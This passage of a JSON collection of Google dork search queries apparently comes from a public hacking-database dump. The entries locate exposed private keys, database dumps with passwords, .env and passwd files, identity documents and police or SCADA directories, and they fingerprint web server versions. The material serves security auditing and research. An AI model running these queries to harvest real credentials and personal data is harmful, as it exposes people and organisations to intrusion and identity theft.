"intitle:\"index of\" \"oauth-private.key\"", "description": "# Dork:intitle:\"index of\" \"oauth-private.key\"\r\n# Oauth Private Keys\r\n# Author: Ambadi MP"}, {"dork": "inurl:member filetype:xls", "description": "Dork:- inurl:member filetype:xls\r\nDescription:- This dork can find Excel spreadsheets in an members\r\ndirectory. Many times these documents contain sensitive information.\r\n\r\nAuthor : GAGAN KUMAR JHA\r\nDATE: 18/06/2020\r\nLinkedin: https://www.linkedin.com/in/gagan-kumar-jha55/"}, {"dork": "Index of: /services/pancard/", "description": "# Google dork: Index of: /services/pancard/\r\n# Exploit Author: Harsh Wadhwani\r\n# Description: The dork list out Personally identifiable information on a\r\n# website (Sensitive information)\r\n\r\nRegards"}, {"dork": "intitle:\"index of\" \"ssh_host_ecdsa_key\"", "description": "# Dork : intitle:\"index of\" \"ssh_host_ecdsa_key\"\r\n# Sensitive Directory contains Private keys\r\n# Author : Ambadi MP"}, {"dork": "Google Dork : Index of: /services/aadhar card/", "description": "Google Dork : Index of: /services/aadhar card/\r\nThis google dork will list a personal identification.\r\n(Sensitive Information)\r\n#Author : Pratik Khalane\r\n# Date : 27/06/2020"}, {"dork": "intitle:\"index of\" \"app.log\"", "description": "# Dork : intitle:\"index of\" \"app.log\"\r\n# Sensitive Informations\r\n# Author : Ambadi MP"}, {"dork": "\"Index of\" \"/monitoring\"", "description": "Google Dork: \"Index of\" \"/monitoring\"\r\nCategory: Files containing Juicy Information\r\n\r\nLet me know, how shall we proceed further.\r\n\r\nKind Regards,\r\nPawan Chhabria"}, {"dork": "intitle:\"index of\" \"/home/ROOT_PATH/\"", "description": "# Google Dork: intitle:\"index of\" \"/home/ROOT_PATH/\"\r\n# Sensitive directories.\r\n# Date: 29/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of c:xampp\"", "description": "intitle:\"Index of c:\\xampp\"\r\nCategory: Sensitive Directory\r\nSummary: A Google dork that gives information about the Sensitive Directory."}, {"dork": "intitle:\"index of\" \"/root/etc/security/\"", "description": "# Google Dork: intitle:\"index of\" \"/root/etc/security/\"\r\n# Juicy information and sensitive directories.\r\n# Date: 8/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of /\" +.htaccess.old", "description": "Description: intitle:\"Index of /\" +.htaccess.old\r\nAccess to the parent directory and more"}, {"dork": "intitle:\"index of\" /var/logs filetype:'\"log | txt | csv\"", "description": "*Google Dork:* intitle:\"index of\" /var/logs filetype:'\"log | txt | csv\"\r\n\r\nDescription:-\r\nDiscovers log files stored on linux servers in open directories of websites.\r\nSensitive information is exposed on the site.\r\n\r\nDate:- 21st July, 2020\r\nExploit Author:- Siddharth Hingol\r\n\r\nThanks & Regards,\r\nSiddharth Hingol"}, {"dork": "Index: /wp-includes/Text/Diff", "description": "Google Dork : Index: /wp-includes/Text/Diff\r\n\r\nDescription: This dork will help to find sensitive directories.\r\n(Sensitive Data)\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate: 18/07/2020"}, {"dork": "intitle:\"index of\" /lsass.exe", "description": "Dorks:\r\nintitle:\"index of\" /lsass.exe\r\n\r\nSummary:\r\nA Google dork that gives Sensitive information about the lsass.exe\r\ninformation.\r\n-- \r\nThanks & Regards,\r\nPrasad Lingamaiah"}, {"dork": "\"Share Link\" inurl:/share.cgi?ssid=", "description": "# Google Dork: \"Share Link\" inurl:/share.cgi?ssid=\r\n\r\n# myQnap cloud servers files and folder shared.\r\n\r\n# Date: 27/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/000~ROOT~000/\"", "description": "# Google Dork: intitle:\"index of\" \"/000~ROOT~000/\"\r\n# Juicy and sensitive information under Root directory.\r\n# Date: 29/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"firewall.log\" | \"firewall.logs\"", "description": "# Google Dork: intitle:\"index of\" \"firewall.log\" | \"firewall.logs\"\r\n# Juicy info and sensitive directories.\r\n# Date: 10/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- Dump completed\" ext:sql | ext:txt | ext:log", "description": "# Google Dork: \"-- Dump completed\" ext:sql | ext:txt | ext:log\r\n# Sensitive directories.\r\n# Date: 29/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"ws_ftp.log\" ext:log", "description": "# Google Dork: \"ws_ftp.log\" ext:log\r\n# Sensitive directories.\r\n# Date: 1/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- PostgreSQL database dump complete\" ext:sql | ext:txt | ext:log | ext:env", "description": "# Google Dork: \"-- PostgreSQL database dump complete\" ext:sql | ext:txt | ext:log | ext:env\r\n# Sensitive directories.\r\n# Date: 15/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"index of\" \"users.ibd\"", "description": "# Google Dork: \"index of\" \"users.ibd\"\r\n# Description :- Disclosure of database file tables and sensitive files.\r\n# Date: 13/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "\"index of\" \"performance_schema\"", "description": "# Google Dork: \"index of\" \"performance_schema\"\r\n# Description :- Disclosure of sensitive files.\r\n# Date: 17/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "ext:reg [HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSshHostKeys]", "description": "# Google Dork: ext:reg [HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\SshHostKeys]\r\n# This search locates private SSHHostkeys.\r\n# Date: 18/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "GitLab ssh.log ext:log", "description": "# Google Dork: GitLab ssh.log ext:log\r\n# Author: Muralikrishna Janga\r\n# Category: Sensitive Directories\r\n\r\n# About the Dork: Dork would help to find GitLab logs and sensitive\r\ndirectories"}, {"dork": "\"-- Dumping data for table `users` | `people` | `member`\" ext:sql | ext:txt | ext:log | ext:env", "description": "# Google Dork:\"-- Dumping data for table `users` | `people` | `member`\"\r\next:sql | ext:txt | ext:log | ext:env\r\n\r\n# Sensitive directories including usernames, passwords and more.\r\n# Date: 23/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- Dumping data for table * \" ext:sql | ext:xls intext:db | intext:database | intext:password | username", "description": "# Dork: \"-- Dumping data for table * \" ext:sql | ext:xls intext:db | intext:database | intext:password | username\r\nThis dork is helping in finding sensitive directories that includes\r\nusernames and passwords of all tables present in any database.\r\n\r\nThank you"}, {"dork": "intitle:\"index of\" \"/app.log\" | \"/app.logs\"", "description": "# Google Dork: intitle:\"index of\" \"/app.log\" | \"/app.logs\"\r\n# Sensitive Directories.\r\n# Date: 24/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"index of\" \"email.ini\"", "description": "Google Dork: \"index of\" \"email.ini\"\r\nDescription : Disclosure of database file tables and sensitive files.\r\nDate : 26/09/2020\r\nAuthor: Aninda Saha"}, {"dork": "intitle:\"Everything\" inurl:C:Windows", "description": "# Dork: intitle:\"Everything\" inurl:C:\\Windows\r\n# Sensitive directories"}, {"dork": "intitle:\"index of\" \"/system.log\" | \"/system.logs\"", "description": "# Google Dork: intitle:\"index of\" \"/system.log\" | \"/system.logs\"\r\n\r\n# Sensitive directories with juicy info.\r\n\r\n# Date: 2/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"slapd.conf\"", "description": "# Google Dork: intitle:\"index of\" \"slapd.conf\"\r\n\r\n# Sensitive directories containing passwords and more...\r\n\r\n# Date: 5/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"index of\" \"mysql.sh\"", "description": "# Title: Sensitive Data Exposure\r\n# Google Dork: \"index of\" \"mysql.sh\"\r\n# Date: 2020-09-14\r\n\r\n# Author: Virendra Tiwari\r\n# LinkedIn: https://www.linkedin.com/in/virendratiwari/"}, {"dork": "intitle:\"index of\" \"/CFIDE/\" intext:\"administrator\"", "description": "# Google Dork: intitle:\"index of\" \"/CFIDE/\" intext:\"administrator\"\r\n# Sensitive directories.\r\n# Date: 8/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle: \"Index of\" inurl:admin/uploads", "description": "# Google Dork: intitle: \"Index of\" inurl:admin/uploads\r\n\r\n# Sensitive upload contents from Websites.\r\n\r\n# Author:SARATH G"}, {"dork": "intitle:\"index of\" \"server.crt\" | \"server.csr\"", "description": "# Google Dork: intitle:\"index of\" \"server.crt\" | \"server.csr\"\r\n\r\n# Certificates and private keys...\r\n\r\n# Date: 13/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:node_modules/mqtt/test/helpers/", "description": "Author: Rahul Parmar\r\nGoogle Dork : inurl:node_modules/mqtt/test/helpers/\r\nDate: 15-Oct-2020\r\nExpose Private key"}, {"dork": "inurl:8080 + intext:\"httpfileserver 2.3\"", "description": "# Google Dork: inurl:8080 + intext:\"httpfileserver 2.3\"\r\n\r\n# Sensitive directories.\r\n\r\n# Date: 20/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl: /.git", "description": "# DorK: inurl: /.git\r\n# Author Name: Tuhin Bose\r\n\r\nDescription: Contains sensitive info about github repos."}, {"dork": "intitle:\"index of\" \"WebServers.xml\"", "description": "# Google Dork: intitle:\"index of\" \"WebServers.xml\"\r\n# Sensitive directories.\r\n# Date: 3/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- Dumping data for table `admin`\" | \"-- INSERT INTO `admin`\" \"VALUES\" ext:sql | ext:txt | ext:log | ext:env", "description": "# Google Dork: \"-- Dumping data for table `admin`\" | \"-- INSERT INTO `admin`\" \"VALUES\" ext:sql | ext:txt | ext:log | ext:env\r\n# Sensitive directories containing many times admin usernames and passwords.\r\n# Date: 3/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:index of .git/hooks/", "description": "Dorks: intitle:index of .git/hooks/\r\nCategory: Sensitive Information\r\nSummary: Contains sensitive info about the Github repository."}, {"dork": "intitle:\"index of\" \"*.cert.pem\" | \"*.key.pem\"", "description": "# Google Dork: intitle:\"index of\" \"*.cert.pem\" | \"*.key.pem\"\r\n# Sensitive directories containing Private Keys and more...\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ssh_host_dsa_key.pub + ssh_host_key + ssh_config = \"index of / \"", "description": "#Google dork: ssh_host_dsa_key.pub + ssh_host_key + ssh_config = \"index of/ \"\r\n#Catregory: Sensitive directories\r\n#Expoit Author: Abishekraghav Murugeashan\r\n#linkedIn: https://www.linkedin.com/in/arhaxor21/"}, {"dork": "\"index of\" inurl:database ext:sql | xls | xml | json | csv", "description": "# Title: Sensitive Data Exposure\r\n# Google Dork: \"index of\" inurl:database ext:sql | xls | xml | json | csv\r\n# Date: 2020-11-10\r\n\r\n# Author: Yogender Singh\r\n# LinkedIn: https://www.linkedin.com/in/imyoge10/\r\n\r\nRegards\r\nYogender Singh"}, {"dork": "intitle:\"index of\" \"dump.sql\"", "description": "# Google Dork: intitle:\"index of\" \"dump.sql\"\r\n# Sensitive directories that reveal total info about the database tables, users, passwords..etc\r\n# Date: 20/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" inurl:admin/download", "description": "# Google Dork: intitle:\"index of\" inurl:admin/download\r\n# Sensitive Directories\r\n# Date: 23/11/2020\r\n# Exploit Author: Ayd\u0131n Baran Ertemir"}, {"dork": "/etc/certs + \"index of /\" */*", "description": "#Google dork: /etc/certs + \"index of /\" */*\r\n\r\n#Catregory: Sensitive directories\r\n\r\n#Expoit Author: Abishekraghav Murugeashan\r\n\r\n#linkedIn: https://www.linkedin.com/in/arhaxor21/"}, {"dork": "/etc/config + \"index of /\" /", "description": "# Google Dork: \"/etc/config + \"index of /\" */*\"\r\n\r\n# Title: Sensitive file disclosure\r\n\r\n# Date: 04/12/2020\r\n# Author: Manish Solanki\r\n\r\n# LinkedIn: https://www.linkedin.com/company/thehacktivists/\r\n\r\n# Bugcrowd: https://bugcrowd.com/ethicalhaxter"}, {"dork": "\"-- Dumped from database version\" + \"-- Dumped by pg_dump version\" ext:txt | ext:sql | ext:env | ext:log", "description": "# Google Dork: \"-- Dumped from database version\" + \"-- Dumped by pg_dump version\" ext:txt | ext:sql | ext:env | ext:log\r\n# Sensitive directories.\r\n# Date: 12/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:(\"Index of\" AND \"wp-content/plugins/boldgrid-backup/=\")", "description": "# Google Dork: intitle:(\"Index of\" AND \"wp-content/plugins/boldgrid-backup/=\")\r\n# Sensitive directories.\r\n# Date: 15/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"*Maildir/new\"", "description": "# Google Dork: intitle:\"index of\" \"*Maildir/new\"\r\n# Sensitive directories where many email directories and emails can be found...\r\n# Date: 16/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/jsps/testoperation.jsp \"Test Operation\"", "description": "# Google Dork: inurl:/jsps/testoperation.jsp \"Test Operation\"\r\n\r\n# Sensitive directories.\r\n\r\n# Date: 11/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/certs/server.key", "description": "Google Dork: inurl:/certs/server.key\r\n\r\nThis will expose the Private RSA Key.\r\n(Sensitive Data Exposure)\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate: 01/02/2021"}, {"dork": "inurl:print.htm intext:\"Domain Name:\" + \"Open printable report\"", "description": "# Google Dork: inurl:print.htm intext:\"Domain Name:\" + \"Open printable report\"\r\n\r\n# Sensitive directories.\r\n\r\n# Date: 27/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:tcpconfig.html", "description": "Dorks: inurl:tcpconfig.html\r\n\r\nCategory: Various Online Devices\r\n\r\nSummary:\r\nA Google dork that gives the online Device information."}, {"dork": "\"-----BEGIN PGP PRIVATE KEY BLOCK-----\" ext:pem | ext:key | ext:txt -git", "description": "# Google Dork: \"-----BEGIN PGP PRIVATE KEY BLOCK-----\" ext:pem | ext:key | ext:txt -git\r\n# Sensitive directories.\r\n# Date: 9/2/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-----BEGIN EC PRIVATE KEY-----\" | \" -----BEGIN EC PARAMETERS-----\" ext:pem | ext:key | ext:txt", "description": "# Google Dork: \"-----BEGIN EC PRIVATE KEY-----\" | \" -----BEGIN EC PARAMETERS-----\" ext:pem | ext:key | ext:txt\r\n# Sensitive directories.\r\n# Date: 9/2/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/wp-content/uploads/wp-file-manager-pro", "description": "Description : inurl:/wp-content/uploads/wp-file-manager-pro\r\n\r\nThis google dork gives us the Sensitive Directories details of\r\nmisconfigured servers."}, {"dork": "inurl:wp-content/uploads/ intitle:logs", "description": "Description: inurl:wp-content/uploads/ intitle:logs \r\n\r\nThis google dork gives us the Sensitive Directories details of misconfigured servers."}, {"dork": "inurl:/wp-content/uploads/wp-file-manager-pro/fm_backup", "description": "# Google Dork: inurl:/wp-content/uploads/wp-file-manager-pro/fm_backup\r\n# Sensitive Directories\r\n# Date: 18/04/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" intext:\"client.key.pem\"", "description": "# Dork: *intitle:\"index of\" intext:\"client.key.pem\"*\r\n\r\nThis google dork gives us access to sensitive data stored on servers, such\r\nas private client and server keys.\r\n\r\nThank you,\r\nKetki Davda"}, {"dork": "intitle:\"index of\" \"/.vscode\"", "description": "# Dork: intitle:\"index of\" \"/.vscode\"\r\n# Finding directories with sensitive information\r\n\r\n-- \r\nRegards,\r\n\r\n*Hilary Soita.*"}, {"dork": "intext:\"CAD Media Log\"", "description": "# Google Dork: intext:\"CAD Media Log\"\r\n# Date: 2021-05-20\r\n# Author: Issac Briones\r\n\r\n# This dork reveals online records for computer aided dispatch systems used by police."}, {"dork": "intitle:\"index of\" \"/configs\"", "description": "# Google Dork: intitle:\"index of\" \"/configs\"\r\n\r\n# Sensitive directories containing many times usernames, passwords and\r\nother juicy information like emails, IPs, hostnames and more...\r\n\r\n# Date: 29/06/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:filemanager/upload/asp/ \"index of\"", "description": "# Google Dork: inurl:filemanager/upload/asp/ \"index of\"\r\n# Category: Sensitive Directories\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"index of\" \"contacts.vcf\"", "description": "# Google Dork: intitle:\"index of\" \"contacts.vcf\"\r\n# Sensitive Directories\r\n# Date: 19/08/2021 \r\n# Exploit Author: Hilary Soita"}, {"dork": "intitle:index.of (inurl:admin | intitle:admin)", "description": "# Google Dork: intitle:index.of (inurl:admin | intitle:admin)\r\n# Pages Containing Login Portals\r\n# Date: 16/08/2021 \r\n# Exploit Author: Saurabh Gupta"}, {"dork": "intitle: \"Index of\" inurl:fileadmin", "description": "#Google Dork : intitle: \"Index of\" inurl:fileadmin\r\n# Sensitive Directories\r\n#Date: 10/07/2021\r\n#Exploit Author : Tanvir Imon"}, {"dork": "intitle:\"index of\" \"private/log\"", "description": "# Google Dork: intitle:\"index of\" \"private/log\"\r\n# Sensitive Directories\r\n# Date: 08/07/2021 \r\n# Exploit Author: Rahul Kumar"}, {"dork": "Google Dork: intitle: \"index of\" \"payment\"", "description": "# Google Dork: intitle: \"index of\" \"payment\"\r\n# Sensitive Directories\r\n# Date:21/09/2021\r\n# Exploit Author: Bon Sai"}, {"dork": "intitle:\"index of SCADA\"", "description": "# Google Dork: intitle:\"index of SCADA\"\r\n# Sensitive Directories\r\n# Date: 01/10/2021 \r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle: \"index of backup.php\"", "description": "# Google Dork: intitle: \"index of backup.php\"\r\n# Sensitive Directories\r\n# Date:06/10/2021\r\n# Exploit Author: Naman Shah"}, {"dork": "intitle: \"index of backup.xml\"", "description": "# Google Dork: intitle: \"index of backup.xml\"\r\n# Sensitive Directories\r\n# Date: 06/10/2021 \r\n# Exploit Author: Naman Shah"}, {"dork": "intitle:\" index of \"/Invoices*\"", "description": "# Google Dork: intitle:\" index of \"/Invoices*\"\r\n# Sensitive Directories\r\n# Date:09/10/2021\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "intitle:\"index of\" \".env\"", "description": "# Google Dork: intitle:\"index of\" \".env\"\r\n# Sensitive Directories\r\n# Date: 29/10/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"index of /\" \"sqlite.db\"", "description": "# Google Dork: intitle:\"index of /\" \"sqlite.db\"\r\n# Sensitive Directories\r\n# Date: 02/12/2021\r\n# Exploit Author: Luc Moreau"}, {"dork": "site:com intitle:index of ..................etcpasswd", "description": "This google dork gives us *passwd files* in *.com* top level domains .\r\n*/etc/passwd* file contains files list of users in Linux\r\n\r\n\r\nRegards,\r\n*Supriyo Guha*"}, {"dork": "intitle:Index of \"pyvenv.cfg\"", "description": "# Google Dork: intitle:Index of \"pyvenv.cfg\"\r\n# Sensitive Directories\r\n# Date: 07/02/2022\r\n# Exploit Author: Devanshi Gajjar"}, {"dork": "intitle:Index of \"/venv\"", "description": "# Google Dork: intitle:Index of \"/venv\"\r\n# Sensitive Directories\r\n# Date: 08/09/2022 \r\n# Exploit Author: Abhishek Singh"}, {"dork": "intitle:\"index of\" database.properties", "description": "# Google Dork: intitle:\"index of\" database.properties\r\n# Description:- This page contains various database.properties of spring\r\nMVC,\r\n# Author: Odela Rohith\r\n# Date: 28-DEC-2023\r\n# Linkedin: https://www.linkedin.com/in/odela-rohith-b723a7122/\r\n# Facebook: https://www.facebook.com/odela.rohith.7\r\n\r\nRegards,\r\nOdela Rohith"}], "Web Server Detection": [{"dork": "\"Novell, Inc\" WEBACCESS Username Password \"Version *.*\" Copyright -inurl:help -guides|guide", "description": "This may be used to find Novell Grouwise Webaccess servers."}, {"dork": "intext:\"404 Object Not Found\" Microsoft-IIS/5.0", "description": "This search finds IIS 5.0 error pages = IIS 5.0 Server"}, {"dork": "intitle:\"Object not found\" netware \"apache 1..\"", "description": "This search will show netware apache webservers as the result."}, {"dork": "intitle:\"Object not found!\" intext:\"Apache/2.0.* (Linux/SuSE)\"", "description": "This one detects apache werbservers (2.0.X/SuSE) with its error page."}, {"dork": "intitle:\"Welcome to Your New Home Page!\" \"by the Debian release\"", "description": "This finds the default Apache page on Debian installs."}, {"dork": "(inurl:81-cobalt | inurl:cgi-bin/.cobalt)", "description": "Cobal RaQ internal pages"}, {"dork": "intitle:\"Test Page for the Apache HTTP Server on Fedora Core\" intext:\"Fedora Core Test Page\"", "description": "Apache 2.0 on Fedore Core Test page"}, {"dork": "intitle:\"Welcome to Windows Small Business Server 2003\"", "description": "Another way to find Small Business Server 2003, for more results check the dork by JimmyNeutron (id=763)."}, {"dork": "intitle:\"Welcome To Your WebSTAR Home Page\"", "description": "This is the default page for the WebSTAR (Macintosh) web server (Headers say --> Server: WebSTAR NetCloak)."}, {"dork": "intitle:\"Document title goes here\" intitle:\"used by web search tools\" \" example of a simple Home Page\"", "description": "IBM Http Server (AS/400)"}, {"dork": "intitle:\"Welcome to 602LAN SUITE *\"", "description": "The 602LAN SUITE runs on a webserver called WEB602/1.04 and includes webmail."}, {"dork": "(intitle:\"502 Proxy Error\")|(intitle:\"503 Proxy Error\") \"The proxy server could not handle the request\" -topic -mail -4suite -list -site:geocrawler.co", "description": "A reverse proxy is a gateway for servers, and enables one web server to provide content from another transparently. These are often implemented to improve security or performance."}, {"dork": "inurl:nnls_brand.html OR inurl:nnls_nav.html", "description": "Novell Nterprise Linux Services detection dork. Some of the features are:* iFolder* Samba* NetStorage* eDirectory Administration* Linux User Management* NMAS 2.3* NetMail 3.5* GroupWise 6.5* iPrint* Virtual Office"}, {"dork": "intitle:\"Apache Status\" \"Apache Server Status for\"", "description": "New Apache Server Status Dork"}, {"dork": "intitle:\"BadBlue: the file-sharing web server anyone can use\"", "description": "Badblue file sharing web server detection"}, {"dork": "intitle:\"Welcome to IIS 4.0\"", "description": "Moving from personal, lightweight web servers into more production-ready software, we find that even administrators of Microsoft's Internet Information Server (IIS) sometimes don't have a clue what they're doing. By searching on web pages with titles of \"Welcome to IIS 4.0\" we find that even if they've taken the time to change their main page, some dorks forget to change the titles of their default-installed web pages. This is an indicator that their web server is most likely running, or was upgraded from, the now considered OLD IIS 4.0 and that at least portions of their main pages are still exactly the same as they were out of the box. Conclusion? The rest of the factory-installed stuff is most likely lingering around on these servers as well. Old code: FREE with operating system.Poor content management: an average of $40/hour. Factory-installed default scripts: FREE with operating system.Getting hacked by a script kiddie that found you on Google: PRICELESS.For all the things money can't buy, there's a googleDork award."}, {"dork": "\"powered by openbsd\" +\"powered by apache\"", "description": "I like the OpenBSD operating system. I really do. And I like the Apache web server software. Honestly. I admire the mettle of administrators who take the time to run quality, secure software. The problem is that you never know when security problems will pop up. A BIG security problem popped up within the OpenBSD/Apache combo back in the day.Now, every administrator that advertised this particular combo with cute little banners has a problem. Hackers can find them with Google. I go easy on these folks since the odds are they.ve patched their sites already. Then again, they may just show up on zone-h.."}, {"dork": "filetype:asmx inurl:(_vti_bin|api|webservice)", "description": "this dork will return web service ."}, {"dork": "inurl:\"/web-console/\" intitle:\"Administration Console\"", "description": "JBoss Application Server Info\n-Xploit"}, {"dork": "intext:Apache/2.2.29 (Unix) mod_ssl/2.2.29 | intitle:\"Index of /\"", "description": "Server Name and Port.\n-Xploit"}, {"dork": "intitle:\"Index of /\" \"Proudly Served by Surftown at\"", "description": "Finds Surftown HTTP servers\nDxtroyer"}, {"dork": "intitle:\"Index of\" \"Apache/2.4.7 (Ubuntu) Server\"", "description": "Dork: intitle:\"Index of\" \"Apache/2.4.7 (Ubuntu) Server\"\nDesc: This dork is used to find Ubuntu servers and a certain version of\nApache. Modify it to find the servers you need."}, {"dork": "inurl:readme.rst intext:\"CodeIgniter\"", "description": "Google Search:inurl:readme.rst intext:\"CodeIgniter\"\nExplanation: CodeIgniter comes with a default offline readme.rst which\nmost of the installed applications don't remove and gets indexed. Its can\nable to identify the framework and exploit it.\n*Vishnu Prasad P G*"}, {"dork": "intext:\"Welcome to CodeIgniter!\"", "description": "Google dork which helps to identify CodeIgniter applications\n- Anand"}, {"dork": "intitle:\"Welcome to Windows 2000 Internet Services\"", "description": "At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: \"Any users attempting to connect to this site are currently receiving an 'Under Construction page'\" THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature..."}, {"dork": "intitle:\"Apache HTTP Server\" intitle:\"documentation\"", "description": "When you install the Apache web server, you get a nice set of online documentation. When you learn how to use Apache, your supposed to delete these online Apache manuals. These sites didn't. If they're in such a hurry with Apache installs, I wonder what else they rushed through?"}, {"dork": "inurl:tech-support inurl:show Cisco", "description": "This is a way to find Cisco products with an open web interface. These are generally supposed to be user and password protected. Google finds ones that aren't. Be sure to use Google's cache if you have trouble connecting. Also, there are very few results (2 at the time of posting.)"}, {"dork": "i_index.shtml Ready", "description": "These printers are not-only web-enabled, but their management interface somehow got crawled by google! These puppies should not be public! You can really muck with these printers. In some cases, going to the \"password.shtml\" page, you can even lock out the admins if a username and password has not already been set! Thanks to mephisteau@yahoo.co.uk for the idea =)"}, {"dork": "aboutprinter.shtml", "description": "More Xerox printers on the web! Google found these printers. Should their management interface be open to the WHOLE INTERNET? I think not."}, {"dork": "\"seeing this instead\" intitle:\"test page for apache\"", "description": "This is the default web page for Apache 1.3.11 - 1.3.26. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."}, {"dork": "intitle:\"Test Page for Apache\" \"It Worked!\"", "description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."}, {"dork": "intitle:\"Test Page for Apache\" \"It Worked!\" \"on this web\"", "description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."}, {"dork": "allintitle:Netscape FastTrack Server Home Page", "description": "This finds default installations of Netscape Fasttrack Server. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps."}, {"dork": "intitle:\"Test Page for Apache\"", "description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."}, {"dork": "intitle:Snap.Server inurl:Func=", "description": "This page reveals the existance of a SNAP server (Netowrk attached server or NAS devices) Depending on the configuration, these servers may be vulnerable, but regardless the existance of this server is useful for information gathering."}, {"dork": "intitle:\"300 multiple choices\"", "description": "This search shows sites that have the 300 error code, but also reveal a server tag at the bottom of the page that an attacker could use to profile a system."}, {"dork": "inurl:domcfg.nsf", "description": "This will return a listing of servers running Lotus Domino. These servers by default have very descriptive error messages which can be used to obtain path and OS information. In addition, adding \"Login Form Mapping\" to the search will allow you to see detailed information about a few of the servers that have this option enabled."}, {"dork": "allinurl:\".nsconfig\" -sample -howto -tutorial", "description": "Access to a Web server's content, CGI scripts, and configuration files is controlled by entries in an access file. On Apache and NCSA Web servers the file is .htaccess, on Netscape servers it is .nsconfig.These files associate users, groups, and IP addresses with various levels of permissions: GET (read), POST (execute), PUT (write), and DELETE. For example, a FrontPage author would have permission to use HTTP POST commands (to save new content), and a user with browse permissions would be permitted to use HTTP GET commands (to read content)."}, {"dork": "HTTP_USER_AGENT=Googlebot", "description": "This is a generic way of grabbing those CGI-spewed environmental var lists. To narrow to things down, an attacker could use any of the following: SERVER_SIGNATURE, SERVER_SOFTWARE, TNS_ADMIN, DOCUMENT_ROOT, etc."}, {"dork": "intitle:\"Page rev */*/*\" inurl:\"admin", "description": "Red Hat UNIX Administration Pages. This search detects the fixed title for the admin pages on certain Red Hat servers. A login is required to access them, but an attacker could use this search to determine the operating system used by the server."}, {"dork": "\"AnWeb/1.42h\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"CERN httpd 3.0B (VAX VMS)\"", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"JRun Web Server\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"MaXX/3.1\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Microsoft-IIS/* server at\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Microsoft-IIS/4.0\" intitle:index.of", "description": "The version of 